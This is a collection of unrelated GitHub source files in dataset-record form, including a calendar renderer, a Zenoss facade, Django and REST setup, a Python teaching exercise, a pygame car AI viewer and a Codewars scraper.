line_end_y)], fill=border_color)\n\n # Horizontal lines\n for i in range(max_rows + 1): # There are max_rows+1 lines\n line_start_x = start_x\n line_start_y = start_y + i * cell_height + cell_height # Start below the month title\n line_end_x = start_x + 7 * cell_width\n line_end_y = line_start_y\n draw.line([(line_start_x, line_start_y), (line_end_x, line_end_y)], fill=border_color)\n\n # Draw month name at the top\n title_text = self.get_config('title_template', \"Let's pretend it's \\\"{month}\\\"\")\n title_text = title_text.replace('{month}', month_name)\n title_text = title_text.replace('{year}', year)\n title_alignment = self.get_config('title_alignment', 'left')\n\n title_width, title_height = title_font.getsize(title_text)\n title_height *= 1.15\n if title_alignment == 'center':\n title_x = start_x + (7 * cell_width - title_width) / 2\n elif title_alignment == 'right':\n title_x = start_x + 7 * cell_width - title_width\n else: # left by default\n title_x = start_x\n\n title_y = start_y + (cell_height - title_height) / 2\n\n draw_text_with_border(draw, (title_x, title_y), title_text, title_font, title_font_color, title_border_color, title_border_width)\n\n # Draw the calendar grid\n current_day = 1 - (start_day + 1)\n for row in range(max_rows):\n for col in range(7):\n if 1 <= current_day <= last_day:\n day_text = str(current_day)\n if current_day == now.day:\n text_width, text_height = draw.textsize(day_text, font=today_font)\n else:\n text_width, text_height = draw.textsize(day_text, font=font)\n text_height *= 1.15\n \n x = start_x + col * cell_width + (cell_width - text_width) / 2\n y = start_y + (row + 1) * cell_height + (cell_height - text_height) / 2\n if current_day == now.day:\n draw_text_with_border(draw, (x, y), day_text, today_font, today_font_color, today_border_color, today_border_width)\n else:\n draw_text_with_border(draw, (x, y), day_text, font, font_color, border_color, border_width)\n current_day += 1\n \n self.log(f\"Added calendar for month: {month_name}\")","repo_name":"FrameOS/frameos","sub_path":"frameos/apps/calendar/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"17623867523","text":"import logging\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\nfrom Products.ZenUtils.application import IApplicationManager\nfrom Products.Zuul.interfaces import IApplicationFacade\n\nLOG = logging.getLogger(\"Zuul.facades\")\n\n\n@implementer(IApplicationFacade)\nclass ApplicationFacade(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, dataroot):\n \"\"\"\n \"\"\"\n self._dmd = dataroot\n self._svc = getUtility(IApplicationManager)\n\n def getResourcePoolIds(self):\n return ['default']\n \n def query(self, name=None):\n \"\"\"\n Returns a sequence of application objects.\n \"\"\"\n result = self._svc.query(name=name, tags=[\"daemon\"])\n if not result:\n return ()\n return tuple(result)\n\n def queryMasterDaemons(self):\n \"\"\"\n Return an iterable producing application objects not associated\n with any monitor.\n \"\"\"\n result = self._svc.query(tags=[\"daemon\", \"-collector\"])\n if not result:\n return ()\n return tuple(result)\n\n def queryMonitorDaemons(self, monitorId):\n \"\"\"\n Return an iterable producing application objects that are\n associated with specified monitor.\n \"\"\"\n # Get daemons associated with monitor.\n result = self._svc.query(\n monitorName=monitorId, tags=[\"daemon\", \"collector\"]\n )\n if not result:\n return ()\n return tuple(result)\n\n def get(self, applicationId, default=None):\n \"\"\"\n Returns the requested application object.\n \"\"\"\n app = self._svc.get(applicationId, default)\n if not app:\n return default\n return app\n\n def getLog(self, appId, lastCount=None):\n \"\"\"\n Retrieve the log of the identified application. Optionally,\n a count of the last N lines to retrieve may be given.\n \"\"\"\n app = self._svc.get(appId)\n if not app:\n raise RuntimeError(\"No such application '%s'\" % (appId,))\n if app.log:\n count = lastCount if lastCount else 200\n return '\\n'.join(app.log.last(count))\n else:\n return '' # not running, so no log.\n\n def start(self, appId):\n \"\"\"\n Starts the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.start()\n\n def stop(self, appId):\n \"\"\"\n Stops the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.stop()\n\n def restart(self, appId):\n \"\"\"\n Restarts the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.restart()\n\n def updateService(self, appId):\n \"\"\"\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.update()\n\n\n__all__ = (\"ApplicationFacade\",)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/facades/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"27463570106","text":"DATA = [\n {\n 'name': 'Facundo',\n 'age': 72,\n 'organization': 'Platzi',\n 'position': 'Technical Coach',\n 'language': 'python',\n },\n {\n 'name': 'Luisana',\n 'age': 33,\n 'organization': 'Globant',\n 'position': 'UX Designer',\n 'language': 'javascript',\n },\n {\n 'name': 'Héctor',\n 'age': 19,\n 'organization': 'Platzi',\n 'position': 'Associate',\n 'language': 'ruby',\n },\n {\n 'name': 'Gabriel',\n 'age': 20,\n 'organization': 'Platzi',\n 'position': 'Associate',\n 'language': 'javascript',\n },\n {\n 'name': 'Isabella',\n 'age': 30,\n 'organization': 'Platzi',\n 'position': 'QA Manager',\n 'language': 'java',\n },\n {\n 'name': 'Karo',\n 'age': 23,\n 'organization': 'Everis',\n 'position': 'Backend Developer',\n 'language': 'python',\n },\n {\n 'name': 'Ariel',\n 'age': 32,\n 'organization': 'Rappi',\n 'position': 'Support',\n 'language': '',\n },\n {\n 'name': 'Juan',\n 'age': 17,\n 'organization': '',\n 'position': 'Student',\n 'language': 'go',\n },\n {\n 'name': 'Pablo',\n 'age': 32,\n 'organization': 'Master',\n 'position': 'Human Resources Manager',\n 'language': 'python',\n },\n {\n 'name': 'Lorena',\n 'age': 56,\n 'organization': 'Python Organization',\n 'position': 'Language Maker',\n 'language': 'python',\n },\n]\n\n# A.\n# Utilizando filter y maps o listas de orden superior crear las listas\n# name_python_programmer (nombre de los programadores de python) y \n# platzi_workers (trabajadores de platzi) los ejercicios A y B.\n\n# B.\n# Utilizando list comprehensions crear las listas\n# adult_worker y old_worker los ejercicios C y D.\n\ndef run():\n # A.Nombre de los programadores de python\n name_python_programmer = list(filter(lambda worker:worker['language']=='python' ,DATA))\n name_python_programmer = list(map(lambda worker:worker['name'], name_python_programmer))\n\n # Trabajadores de platzi\n platzi_workers = list(filter(lambda worker:worker['organization']=='Platzi', DATA))\n platzi_workers = list(map(lambda worker:worker['name'], platzi_workers))\n\n # B. Adult_worker (trabajadores mayores de 18)\n adult_worker = [worker['name'] for worker in DATA if worker['age'] >= 18]\n \n # Crear una nueva lista de diccionarios llamada old worker que tendra true o false\n old_worker = [worker | {'old': worker['age']>70} for worker in DATA]\n\n for worker in old_worker:\n print (worker)\n\n\nif __name__=='__main__':\n run()","repo_name":"JulianBernalM/curso_python","sub_path":"filtering_data_practice.py","file_name":"filtering_data_practice.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10898227175","text":"import json\n\nfrom recipes.models import Ingredient\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n \"\"\"\n python manage.py CSVexport\n \"\"\"\n\n def handle(self, *args, **kwargs):\n Ingredient.objects.all().delete()\n file_path = 'data/ingredients.json'\n with open(file_path, encoding='utf-8') as file:\n data = json.load(file)\n\n for item in data:\n Ingredient.objects.create(\n name=item['name'],\n measurement_unit=item['measurement_unit']\n )\n","repo_name":"ilyasurkov94/foodgram-project-react","sub_path":"backend/recipes/management/commands/CSVexport.py","file_name":"CSVexport.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74753594115","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n#----------------------------------------------------------------------------\n# Creado por : davoc\n# En : Clase 6 Ciclos, ciclo FOR. mision tic 2022. 9 Mayo 2022 \n# # version ='1.0' VsCodium\n\n\n#en los ciclos for siempre debera ir la variable de control,. y va a ir cambiando de valores, sea incrementando o decreciendo según el rango\n# en estos rangos el primero numero esta incluido, el segundo no. \n\nfor i in range(1,10):\n print(i)\n\nfor i in reversed(range(1,10)): #Aqui se imprimen los numeros del 10 al 1. El range se respeta\n print(i)\n\n#Ahora si lo queremos hacer con un ciclo while\ni = 10\nwhile i >= 1:\n print(i)\n i = i - 1\n\n#Tabla de multiplcar\n\nx = 1\nwhile x <= 10:\n print(x*8)\n x = x + 1\n\n# Pero si lo hacemos con for\nfor i in range(1,11):\n print(i*8)\n","repo_name":"labsigco/Mision51_2022","sub_path":"Ciclo1/Unidad1/Scripts/U1_C6_3_CicloFor.py","file_name":"U1_C6_3_CicloFor.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42831365125","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 21 10:41:22 2021\r\n\r\n@author: calle\r\n\"\"\"\r\n\r\n#this package only support xls files\r\nimport xlrd\r\n\r\nimport fixedChargeTransportationModel\r\nimport time\r\n\r\nstart_time_read_data = time.time()\r\n\r\npath=\"C:\\OneDrive - Deakin University\\OD\\Personal\\Software Documentation\\Gurobi\\data fixed charge transportation problem.xlsx\"\r\nbook = xlrd.open_workbook(path)\r\n\r\nsOrigins=[]\r\nsDestinations=[]\r\npSupply={}\r\npDemand={}\r\npCost={}\r\npCostOpen={}\r\n\r\nsh = book.sheet_by_name(\"shOrigins\")\r\n#a = sh.cell_value(0,0)\r\n#print(a)\r\nrow=1\r\nwhile True:\r\n try:\r\n i = sh.cell_value(row,0)\r\n sOrigins.append(i)\r\n pSupply[i]=sh.cell_value(row,1)\r\n row=row+1\r\n except IndexError:\r\n break\r\nsh = book.sheet_by_name(\"shDestinations\")\r\nrow=1\r\nwhile True:\r\n try:\r\n j = sh.cell_value(row, 0)\r\n sDestinations.append(j)\r\n pDemand[j]=sh.cell_value(row,1)\r\n row=row+1\r\n except IndexError:\r\n break\r\n\r\nsh = book.sheet_by_name(\"shOriginsDestinations\")\r\nrow=1\r\nwhile True:\r\n try:\r\n i = sh.cell_value(row, 0)\r\n j = sh.cell_value(row, 1)\r\n \r\n pCost[i,j]=sh.cell_value(row,2)\r\n row=row+1\r\n except IndexError:\r\n break\r\n\r\nend_time_read_data = time.time()\r\n\r\nprint('read from xlrd takes' + str(end_time_read_data-start_time_read_data))\r\nprint(\"--- %s seconds ---\" % (end_time_read_data-start_time_read_data))\r\n\r\noutputVTransport =fixedChargeTransportationModel.transModel(sOrigins, sDestinations, pSupply, pDemand, pCost, pCostOpen)[0]\r\n\r\n\r\n","repo_name":"juanescasa/LearningGurobi","sub_path":"reading data from excel Fixed Charge Transportation Problem.py","file_name":"reading data from excel Fixed Charge Transportation Problem.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"384943342","text":"\"\"\"Kata url: https://www.codewars.com/kata/5a57d101cadebf03d40000b9.\"\"\"\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://www.codewars.com/users/leaderboard\"\n\n\nclass OneIndexedList(list):\n def __getitem__(self, index):\n return super().__getitem__(index - 1)\n\n\n@dataclass\nclass Leaderboard:\n position: OneIndexedList\n\n\n@dataclass\nclass User:\n name: str\n clan: str\n honor: int\n\n\ndef solution() -> Leaderboard:\n soup = BeautifulSoup(requests.get(URL).text, \"html.parser\")\n return Leaderboard(\n OneIndexedList(\n User(\n x.parent[\"data-username\"],\n x.previous_element.text,\n int(x.text.replace(\",\", \"\")),\n )\n for x in soup.find_all(\"td\", class_=\"honor\")\n )\n )\n\n\ndef test_solution():\n leaderboard = solution()\n\n assert len(leaderboard.position) == 500\n\n assert leaderboard.position[1].name\n assert all(isinstance(u.honor, int) for u in leaderboard.position)\n","repo_name":"Sigmanificient/codewars","sub_path":"src/python/katas/py6kyu/codewars_leaderboard.py","file_name":"codewars_leaderboard.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"5436502348","text":"from smtplib import SMTPException\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail as send\n\nfrom config.celery import app\n\n\n@app.task\ndef send_mail(\n\t\tsubject: str,\n\t\tbody: str,\n\t\trecipient_list: str | list,\n\t\tfrom_email: str = settings.EMAIL_HOST_USER) -> dict:\n\ttry:\n\t\tsend(subject, body, from_email, [recipient_list])\n\texcept SMTPException as ex:\n\t\tsubject = subject.encode('utf-8')\n\t\treturn {'Exeption': ex, subject: recipient_list}\n\treturn {subject: recipient_list}\n","repo_name":"satan1437/Micro-link","sub_path":"users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23555449331","text":"t=int(input())\r\nfor t in range(t):\r\n st=input()\r\n st=list(st)\r\n st.reverse()\r\n #print(st)\r\n print('Case #',end='')\r\n print(t+1,end=': ')\r\n for i in range(len(st)-1):\r\n if(st[i]>=st[i+1]):\r\n continue\r\n else:\r\n st[i+1]=str(int(st[i+1])-1)\r\n for j in range(i+1):\r\n st[j]='9'\r\n \r\n \r\n st.reverse()\r\n st=''.join(st)\r\n print(int(st))\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2387.py","file_name":"2387.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36406335100","text":"from arcade import *\nfrom math import *\n\nSCREEN_HEIGHT = 600\nSCREEN_WIDTH = 600\n\nSCREEN_TITLE = \"彩虹\"\n\n\nclass MyScan(arcade.Window):\n def __init__(self, width, height, title):\n super().__init__(width, height, title)\n self.setup()\n\n def setup(self):\n set_background_color(color.WHITE)\n self.color = [color.RED, color.ORANGE, color.YELLOW,\n color.LIGHT_GREEN, color.BLUE, color.PURPLE, color.MAGENTA]\n\n def on_draw(self):\n start_render()\n self.mydraw()\n\n def mydraw(self):\n oy, ox = SCREEN_HEIGHT//2, SCREEN_WIDTH // 2\n r = 200\n for i in range(6):\n draw_arc_outline(ox, oy, r + 10 * i, r + 10 * i, self.color[i],\n 0, 180, 10)\n\n\nif __name__ == '__main__':\n game = MyScan(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n run()\n","repo_name":"PythonOrC/PythonCodeArchive","sub_path":"program/科学与历史主题包/Arcade/彩虹.py.py","file_name":"彩虹.py.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32687533961","text":"import pygame\nimport math\nimport roads\nfrom car_ai_instance import *\nfrom car_ai_utils import *\nimport random\nimport numpy as np\nimport torch\nimport time\nimport os\n\npygame.init()\n\nGRAY = (100, 100, 100)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 100, 100)\nGREEN = (100, 255, 100)\n\nif __name__== \"__main__\":\n display_width = 800\n display_height = 600\n fps = 30\n dir = \"./brains/2021-03-25 22_46_46.231196\"\n\n gameDisplay = pygame.display.set_mode((display_width, display_height))\n clock = pygame.time.Clock()\n pygame.display.set_caption('Car')\n font = pygame.font.SysFont('arialblack', 18)\n\n crashed = False\n running_time = 0.0\n gen = 0\n\n data = dataloader([roads.road2, roads.road3], 50)\n files = os.listdir(dir)\n def get_gen(x):\n s = x.split('s')[0]\n return int(s[3:])\n files.sort(key=get_gen)\n\n agent = car_ai_instance(pos=data.get_data().pos, angle=data.get_data().angle)\n agent.brain = torch.load(dir + '/' + files[0])['model']\n print('Showing:', files[0])\n\n key_pressed = {\n 'right': False,\n 'left': False,\n 'up': False,\n 'down': False,\n 'space': False\n }\n\n while not crashed:\n gameDisplay.fill(gray)\n\n agent.tick(clock.get_time()/1000, gameDisplay, data.get_data().data, data.get_data().goals, show=True)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n crashed = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_s:\n agent.car.is_done = True\n\n for seg in data.get_data().data:\n seg.show(gameDisplay, white)\n for goal in data.get_data().goals:\n goal.show(gameDisplay, green)\n\n running_time += clock.get_time()/1000\n if agent.car.is_done:\n running_time = 0\n gen += 1\n if gen >= len(files):\n break\n agent = car_ai_instance(pos=data.get_data().pos, angle=data.get_data().angle)\n agent.brain = torch.load(dir + '/' + files[gen])['model']\n print('Showing:', files[gen])\n data.step()\n\n text1 = font.render('gen ' + str(gen), True, white)\n text2 = font.render('score: ' + str(round(agent.score)), True, white)\n gameDisplay.blit(text1, (1, 1))\n gameDisplay.blit(text2, (1, 15))\n\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()","repo_name":"thomashayama/car_evolution","sub_path":"car_ai_viewer.py","file_name":"car_ai_viewer.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34810734825","text":"from __future__ import unicode_literals\n\nimport datetime\nimport platform\nimport random\n\nfrom oslo_config import cfg\nfrom watcher_metering.agent.measurement import Measurement\nfrom watcher_metering.agent.puller import MetricPuller\n\n\nclass RandomDataPuller(MetricPuller):\n \"\"\"\n This is a demo drivers which shows how a driver should be implemented in\n order to gather data from a source\n \"\"\"\n def __init__(self, title, probe_id, interval, static_data):\n super(RandomDataPuller, self).__init__(title, probe_id, interval)\n self.static_data = static_data\n\n @classmethod\n def get_config_opts(cls):\n return cls.get_base_opts() + [\n cfg.StrOpt('static_data', default=\"static_data\", required=True),\n ]\n\n @classmethod\n def get_name(cls):\n return \"random\"\n\n @classmethod\n def get_default_probe_id(cls):\n return \"data.puller.random\"\n\n @classmethod\n def get_default_interval(cls):\n return 5 # In seconds\n\n def do_pull(self):\n random_value = random.Random().randint(1, 10)\n random_message = \"[%s] random data generated on %s\" % (\n random_value, datetime.datetime.now()\n )\n measurement = Measurement(\n name=self.probe_id,\n unit=\"\",\n type_=\"\",\n value=random_value,\n resource_id=platform.node(),\n resource_metadata={\n \"state\": \"ok\",\n \"static_data\": self.static_data,\n \"description\": random_message\n },\n )\n return [measurement]\n","repo_name":"b-com/watcher-metering","sub_path":"watcher_metering/drivers/examples/random-puller/random_puller/puller.py","file_name":"puller.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33616590026","text":"from rest_framework.routers import DefaultRouter\nfrom .views import PostViewSet, CommentViewSet, \\\n GroupViewSet, FollowViewSet\nfrom django.urls import include, path\nfrom rest_framework_simplejwt.views import TokenObtainPairView,\\\n TokenRefreshView, TokenVerifyView\n\n\napp_name = 'api'\n\nv1_router = DefaultRouter()\n\nv1_router.register('posts', PostViewSet)\nv1_router.register('groups', GroupViewSet)\nv1_router.register(r'posts/(?P\\d+)/comments',\n CommentViewSet, basename='comments')\nv1_router.register('follow', FollowViewSet, basename='follow')\n\nurlpatterns = [\n path('v1/', include(v1_router.urls)),\n path('v1/jwt/create/', TokenObtainPairView.as_view(),\n name='token_obtain_pair'),\n path('v1/jwt/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('v1/jwt/verify/', TokenVerifyView.as_view(), name='token_verify'),\n]\n","repo_name":"marusya-svet/api_final_yatube","sub_path":"yatube_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44218326496","text":"import configparser\nimport logging\n\n\ndef default_logger():\n format = '%(asctime)s - %(name)s - [%(levelname)s] - %(message)s'\n logging.basicConfig(format=format, level=logging.INFO, filename='test.log', filemode='a')\n logger = logging.getLogger('test_logger')\n return logger\n\n\ndef read_config_file(path_ini):\n conf_dict = {}\n conf = configparser.RawConfigParser()\n conf.read(path_ini)\n for section in conf.sections():\n tmp = {opt: val for opt, val in conf.items(section)}\n conf_dict[section] = tmp\n\n return conf_dict\n","repo_name":"Stein13/YehorZdobnikovTestProject","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}